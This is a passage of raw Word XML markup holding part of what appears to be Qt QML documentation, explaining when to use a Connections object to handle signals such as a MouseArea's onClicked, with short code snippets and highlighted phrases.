          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it is not possible</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to connect to a signal in this way </w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in some cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, such as when:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="003C682E" w:rsidRDefault="00CD28D1" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multiple connections to the same signal are required</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="003C682E" w:rsidRDefault="00CD28D1" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating connections outside the scope of the signal sender</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="003C682E" w:rsidRDefault="00CD28D1" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connecting to targets not defined in QML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When any of these are needed, the Connections type can be used instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the above code can be changed to use a Connections object, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00490E7E"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519" w:history="1">
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1"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D28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:hyperlink r:id="rId1520" w:history="1">
        <w:r w:rsidRPr="00CD28D1">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1"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D28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        onClicked</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1"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D28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>More generally, the Connections object can be a child of some object other than the sender of the signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00490E7E"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521" w:history="1">
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1"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D28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> area</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1"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D28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D1">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00490E7E"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522" w:history="1">
        <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD28D1" w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="00CD28D1" w:rsidRDefault="00CD28D1"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D28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    target</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> area</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD28D1" w:rsidRPr="003C682E" w:rsidRDefault="00CD28D1" w:rsidP="00CD28D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D28D1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onClicked</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="003C682E">
